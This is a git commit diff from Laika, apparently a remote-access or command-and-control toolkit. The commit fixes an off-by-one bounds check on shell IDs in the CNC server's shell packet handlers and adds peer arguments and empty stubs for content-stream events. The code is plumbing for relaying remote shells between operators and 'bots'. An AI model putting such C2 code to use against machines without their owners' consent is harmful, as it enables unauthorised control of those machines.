1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-21 20:40:05 +00:00

CNC: Fix possible out of bounds subscript for SHELL_* packets

- content events now pass the sLaika_peer struct
This commit is contained in:
CPunch 2022-06-13 12:11:08 -05:00
parent fb464f579f
commit 0fc8d0c169
5 changed files with 41 additions and 12 deletions

View File

@ -52,4 +52,11 @@ void laikaC_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData);
void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData); void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData);
void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData); void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData);
/* content stream has finished */
void laikaC_contentRecvEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
/* request to open a content stream */
bool laikaC_contentNewEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
/* error happened on a stream */
void laikaC_contentErrEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err);
#endif #endif

View File

@ -41,7 +41,7 @@ void laikaC_sendRmvPeer(struct sLaika_peer *authPeer, struct sLaika_peer *peer)
laikaS_endOutPacket(authPeer); laikaS_endOutPacket(authPeer);
} }
/* ============================================[[ Packet Handlers ]]============================================= */ /* =========================================[[ [Auth] Packet Handlers ]]========================================= */
void laikaC_handleAuthenticatedHandshake(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData) { void laikaC_handleAuthenticatedHandshake(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData; struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData;
@ -100,7 +100,7 @@ void laikaC_handleAuthenticatedShellClose(struct sLaika_peer *authPeer, LAIKAPKT
laikaS_readInt(&authPeer->sock, &id, sizeof(uint32_t)); laikaS_readInt(&authPeer->sock, &id, sizeof(uint32_t));
/* ignore malformed packet */ /* ignore malformed packet */
if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
return; return;
laikaC_closeShell(shell); laikaC_closeShell(shell);
@ -121,7 +121,7 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_
sz -= sizeof(uint32_t); sz -= sizeof(uint32_t);
/* ignore malformed packet */ /* ignore malformed packet */
if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
return; return;
peer = shell->bot; peer = shell->bot;

View File

@ -116,7 +116,7 @@ void laikaC_closeShells(struct sLaika_peer *peer) {
} }
} }
/* ============================================[[ Packet Handlers ]]============================================= */ /* ========================================[[ [Peer] Packet Handlers ]]========================================== */
void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData; struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData;
@ -126,7 +126,7 @@ void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t)); laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
/* ignore packet if shell isn't open */ /* ignore packet if shell isn't open */
if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
return; return;
/* close shell */ /* close shell */
@ -146,7 +146,7 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
laikaS_readInt(&peer->sock, &id, sizeof(uint32_t)); laikaS_readInt(&peer->sock, &id, sizeof(uint32_t));
/* ignore packet if shell isn't open */ /* ignore packet if shell isn't open */
if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL)
return; return;
laikaS_read(&peer->sock, (void*)buf, sz-sizeof(uint32_t)); laikaS_read(&peer->sock, (void*)buf, sz-sizeof(uint32_t));
@ -157,3 +157,20 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
laikaS_write(&shell->auth->sock, buf, sz-sizeof(uint32_t)); laikaS_write(&shell->auth->sock, buf, sz-sizeof(uint32_t));
laikaS_endVarPacket(shell->auth); laikaS_endVarPacket(shell->auth);
} }
/* ============================================[[ Content Handlers ]]============================================ */
/* content stream has finished */
void laikaC_contentRecvEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content) {
}
/* request to open a content stream */
bool laikaC_contentNewEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content) {
}
/* error happened on a stream */
void laikaC_contentErrEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err) {
}

View File

@ -26,9 +26,9 @@ typedef uint8_t CONTENT_TYPE;
typedef uint8_t CONTENT_ERRCODE; typedef uint8_t CONTENT_ERRCODE;
typedef uint16_t CONTENT_ID; typedef uint16_t CONTENT_ID;
typedef void (*contentRecvEvent)(struct sLaika_contentContext *context, struct sLaika_content *content); typedef void (*contentRecvEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
typedef bool (*contentNewEvent)(struct sLaika_contentContext *context, struct sLaika_content *content); typedef bool (*contentNewEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content);
typedef void (*contentErrorEvent)(struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err); typedef void (*contentErrorEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err);
struct sLaika_content { struct sLaika_content {
struct sLaika_content *next; struct sLaika_content *next;
@ -53,6 +53,7 @@ void laikaF_cleanContext(struct sLaika_contentContext *context);
void laikaF_setupEvents(struct sLaika_contentContext *context, contentRecvEvent onRecv, contentNewEvent onNew, contentErrorEvent onError); void laikaF_setupEvents(struct sLaika_contentContext *context, contentRecvEvent onRecv, contentNewEvent onNew, contentErrorEvent onError);
int laikaF_nextID(struct sLaika_peer *peer); /* returns the id that will be assigned to the next sent content */
int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type); int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type);
void laikaF_pollContent(struct sLaika_peer *peer); void laikaF_pollContent(struct sLaika_peer *peer);

View File

@ -110,6 +110,10 @@ struct sLaika_content* laikaF_newContent(struct sLaika_contentContext *context,
return content; return content;
} }
int laikaF_nextID(struct sLaika_peer *peer) {
return peer->context.nextID + 1;
}
int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type) { int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type) {
struct sLaika_contentContext *context = &peer->context; struct sLaika_contentContext *context = &peer->context;
struct sLaika_content *content = laikaF_newContent(context, fd, getSize(fd), context->nextID++, type, CONTENT_OUT); struct sLaika_content *content = laikaF_newContent(context, fd, getSize(fd), context->nextID++, type, CONTENT_OUT);
@ -180,7 +184,7 @@ void laikaF_handleContentNew(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
contentType = laikaS_readByte(&peer->sock); contentType = laikaS_readByte(&peer->sock);
content = laikaF_recvContent(peer, contentID, contentSize, contentType); content = laikaF_recvContent(peer, contentID, contentSize, contentType);
if (context->onNew && !context->onNew(context, content)) { if (context->onNew && !context->onNew(peer, context, content)) {
sendContentError(peer, contentID, CONTENT_ERR_REJECTED); sendContentError(peer, contentID, CONTENT_ERR_REJECTED);
rmvContent(context, content); rmvContent(context, content);
} }
@ -200,7 +204,7 @@ void laikaF_handleContentError(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void
LAIKA_DEBUG("We received an errcode for id %d, err: %d\n", contentID, errCode); LAIKA_DEBUG("We received an errcode for id %d, err: %d\n", contentID, errCode);
if (context->onError) /* check if event exists! */ if (context->onError) /* check if event exists! */
context->onError(context, content, errCode); context->onError(peer, context, content, errCode);
rmvContent(context, content); rmvContent(context, content);
} }
@ -226,6 +230,6 @@ void laikaF_handleContentChunk(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void
rmvContent(context, content); rmvContent(context, content);
} else if ((content->processed += bodySz) == content->sz) { } else if ((content->processed += bodySz) == content->sz) {
if (context->onReceived) /* check if event exists! */ if (context->onReceived) /* check if event exists! */
context->onReceived(context, content); context->onReceived(peer, context, content);
} }
} }